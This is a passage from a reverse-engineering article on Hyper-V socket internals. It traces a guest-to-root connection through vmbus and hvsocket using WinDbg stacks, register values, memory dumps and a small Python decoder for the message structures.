<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhv!WinHvPostMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!PncSendMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!XpartSendMessage (jmp from </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmbus!ChSendMessage</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!ChTlConnectRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlXPartChildSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlProviderConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdConnect</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The parameters of winhv!WinHvPostMessage are:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Rcx = 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Rdx = 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">R9 = 0x28</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @r8 @r8+28 – the message body</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa60d`d4eaebb8 00000015 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa60d`d4eaebc8 00000000 00000000 b1d00d3e 4570fe10 ........>.....pE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa60d`d4eaebd8 487662ad 1b7a9d77</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Before the winhv!WinHvpHypercallRoutine call (which leads to vmcall):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Rcx = 0x5c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Rdx = 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">R8 = 23a9000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">R9 = 0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!dd @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 62af000 00000001 3ba2286a 00000001 00000028</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 62af010 00000015 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 62af020 00000000 00000000 b1d00d3e 4570fe10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 62af030 487662ad 1b7a9d77 00000000 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x15 - CHANNELMSG_TL_CONNECT_REQUEST</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x28 – the size of the transferred message</span></div>
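<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As an added example (not code from the article), the following Python decodes the dump above: first the HV_INPUT_POST_MESSAGE header of the HvCallPostMessage input page, then the CHANNELMSG_TL_CONNECT_REQUEST body with its two GUIDs. The struct layouts are those of the Hypervisor TLFS and the public vmbus headers; the dump text is the article's !dd output, embedded as constructed sample input.</span></div>

```python
"""Decode the HvCallPostMessage input page captured in WinDbg and the vmbus
CHANNELMSG_TL_CONNECT_REQUEST it carries (struct layouts per the Hypervisor
TLFS / public vmbus headers; the dump values are the ones from this article)."""
import re
import struct
import uuid

HVCALL_POST_MESSAGE = 0x5C             # hypercall code seen in rcx before vmcall
CHANNELMSG_TL_CONNECT_REQUEST = 0x15   # vmbus channel message type
HV_MESSAGE_PAYLOAD_BYTE_COUNT = 240    # max payload of HV_INPUT_POST_MESSAGE
HV_GUID_ZERO = uuid.UUID(int=0)

# Constructed from the "!dd @rdx" output in the article (input page at GPA 0x62af000).
WINDBG_DD_OUTPUT = """\
# 62af000 00000001 3ba2286a 00000001 00000028
# 62af010 00000015 00000000 00000000 00000000
# 62af020 00000000 00000000 b1d00d3e 4570fe10
# 62af030 487662ad 1b7a9d77 00000000 00000000
"""

_DWORD = re.compile(r"^[0-9a-fA-F]{8}$")


def dwords_from_windbg(text):
    """Convert dd/!dd/dc output to raw bytes: drop the '#' marker and the
    address column, pack each 8-hex-digit dword little-endian, and stop at
    the ASCII column that dc appends."""
    out = bytearray()
    for line in text.splitlines():
        tokens = [t for t in line.split() if t != "#"]
        if not tokens:
            continue
        for tok in tokens[1:]:          # tokens[0] is the address column
            if not _DWORD.match(tok):
                break                   # start of dc's ASCII column
            out += struct.pack("<I", int(tok, 16))
    return bytes(out)


def parse_post_message_input(buf):
    """HV_INPUT_POST_MESSAGE: ConnectionId, Reserved, MessageType, PayloadSize,
    Payload[PayloadSize]. Returns the header fields and the payload slice."""
    if len(buf) < 16:
        raise ValueError("input shorter than the HV_INPUT_POST_MESSAGE header")
    connection_id, _reserved, message_type, payload_size = struct.unpack_from("<IIII", buf, 0)
    if payload_size > HV_MESSAGE_PAYLOAD_BYTE_COUNT:
        raise ValueError(f"PayloadSize {payload_size:#x} exceeds the 240-byte limit")
    payload = buf[16:16 + payload_size]
    if len(payload) != payload_size:
        raise ValueError("dump is truncated before the end of the payload")
    return {"connection_id": connection_id, "message_type": message_type,
            "payload_size": payload_size, "payload": payload}


def parse_tl_connect_request(payload):
    """vmbus_channel_tl_connect_request: header {msgtype:u32, padding:u32},
    guest_endpoint_id GUID, host_service_id GUID (8 + 16 + 16 = 0x28 bytes)."""
    if len(payload) != 0x28:
        raise ValueError(f"CHANNELMSG_TL_CONNECT_REQUEST must be 0x28 bytes, got {len(payload):#x}")
    msgtype, padding = struct.unpack_from("<II", payload, 0)
    if msgtype != CHANNELMSG_TL_CONNECT_REQUEST:
        raise ValueError(f"unexpected vmbus message type {msgtype:#x}")
    return {
        "msgtype": msgtype,
        "padding": padding,
        # GUIDs are stored in Windows order (little-endian Data1..Data3)
        "guest_endpoint_id": uuid.UUID(bytes_le=payload[8:24]),
        "host_service_id": uuid.UUID(bytes_le=payload[24:40]),
    }


def decode_article_dump(text=WINDBG_DD_OUTPUT):
    """Full decode of the dump: hypercall input header plus the TL connect request."""
    post = parse_post_message_input(dwords_from_windbg(text))
    req = parse_tl_connect_request(post["payload"])
    # An all-zero guest endpoint id is what makes the root side call
    # nt!ExUuidCreate to generate one, as the article describes further on.
    req["endpoint_id_is_zero"] = req["guest_endpoint_id"] == HV_GUID_ZERO
    return post, req


if __name__ == "__main__":
    post, req = decode_article_dump()
    print(f"ConnectionId={post['connection_id']:#x} MessageType={post['message_type']:#x} "
          f"PayloadSize={post['payload_size']:#x}")
    print(f"vmbus msgtype={req['msgtype']:#x} guest_endpoint_id={{{req['guest_endpoint_id']}}} "
          f"host_service_id={{{req['host_service_id']}}}")
```

The same helper reads the `dc` dumps shown elsewhere in the article, since the ASCII column is skipped.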
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The message is sent, and we return to hvsocket!VmbusTlXPartChildSetupConnection. hvsocket!VmbusTlPendConnect -> hvsocket!VmbusTlPendConnectLocked are called. Returning to hvsocket!VmbusTlSetupConnection, hvsocket!VmbusTlConnectQueueTimer is called next (this comes down to an nt!KeSetTimer call; the DPC is hvsocket!VmbusTlConnectTimeoutDpc). We come back to afd!AfdConnect with 103h in eax, so afd!AfdTLPendRequest is called next, and then afd!AfdTLConnectComplete2 (afd!AfdCloseConnection, afd!AfdFinishConnect + nt!IofCompleteRequest).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Exit from afd.sys</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The guest OS has sent the message. Let's separately consider how a message sent through vmbus is processed. As is known from the Hyper-V Internals article, all messages sent through the hvix!HvPostMessage hypercall are processed by vmbus!ChReceiveChannelMessage. We put a bp on this function in the root OS, start ServerExample.exe in the root OS and ClientExample.exe in the guest OS, and the breakpoint hits. In rdx is our message:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7b2379f0 00000015 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7b237a00 00000000 00000000 b1d00d3e 4570fe10 ........>.....pE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7b237a10 487662ad 1b7a9d77</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Here the message is validated, and a pointer to hvsocket!HvSocketProviderConnectNotification is loaded into rax. A buffer of size 48h is allocated (Vnpi tag), and netio!NetioInsertWorkQueue is called with hvsocket!VmbusTlConnectRequestWorkQueueRoutine as a parameter. Processing ends at this point.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Set a bp on hvsocket!VmbusTlConnectRequestWorkQueueRoutine in the root OS and restart the client application; the breakpoint hits. Go to hvsocket!VmbusTlProcessConnectRequestWorkItem: rcx points to 3 GUIDs. </span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffae08`c1bbb880 6a964317 4a741d87 a646f9ab 0089049b – VM GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffae08`c1bbb890 b1d00d3e 4570fe10 487662ad 1b7a9d77 – Service GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffae08`c1bbb8a0 00000000 00000000 00000000 00000000 - HV_GUID_ZERO</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then hvsocket!VmbusTlFindAndReferencePartition is called with HV_GUID_CHILDREN as the 2nd parameter, then hvsocket!VmbusTlFindOrCreateService, then hvsocket!VmbusTlIsServiceEnabled (returns 1).</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The 3rd GUID is checked for equality with HV_GUID_ZERO; if it is equal, nt!ExUuidCreate is called and we receive a GUID:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r xmm0:ud</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xmm0=01cf5129 0c00cd83 11e745c8 da36f003</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then hvsocket!VmbusTlProcessNewConnection is called, then hvsocket!VmbusTlProcessNewConnectionForListener, from which hvsocket!VmbusTlGetPartitionListenerEndpoint is called (we receive an element from an AVL tree), followed by hvsocket!VmbusTlCreateConnection, hvsocket!VmbusTlAssociateConnectionToPartition and hvsocket!VmbusTlSetEndpointId.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, hvsocket!VmbusTlInsertObjectToTable:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt nt!_RTL_AVL_TABLE ffffae08bfb058a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x000 BalancedRoot : _RTL_BALANCED_LINKS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x020 OrderedPointer : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x028 WhichOrderedElement : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x02c NumberGenericTableElements : 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x030 DepthOfTree : 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x038 RestartKey : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x040 DeleteCount : 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x048 CompareRoutine : 0xfffff804`602d16c0 _RTL_GENERIC_COMPARE_RESULTS hvsocket!VmbusTlCompareGuids+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x050 AllocateRoutine : 0xfffff804`602d1db0 void* hvsocket!VmbusTlAllocateForAvlTable+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x058 FreeRoutine : 0xfffff804`602d1dd0 void hvsocket!VmbusTlFreeForAvlTable+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x060 TableContext : 0x00000000`6e6f4350 Void</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then we go through hvsocket!VmbusTlSetObjectCancellable, hvsocket!VmbusTlPendConnect and hvsocket!VmbusTlListenerProcessPendingIncomingConnection.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Return to NETIO!NetiopIoWorkItemRoutine.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the root OS at the same time:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 winhvr!WinHvPostMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 vmbusr!PncSendMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 vmbusr!XPartSendMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 vmbusr!ChSendOfferMessageLocked</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 vmbusr!ChOfferChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbusr!RootIoctlChannelOffered</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 vmbusr!RootIoctlDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbusr!RootDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……………..WDF stuff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">11 vmbusr!RootIoctlDeviceControlPreprocess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………… WDF stuff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16 vmbkmclr!KmclpSynchronousIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 vmbkmclr!KmclpServerOfferChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 vmbkmclr!VmbChannelEnable</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
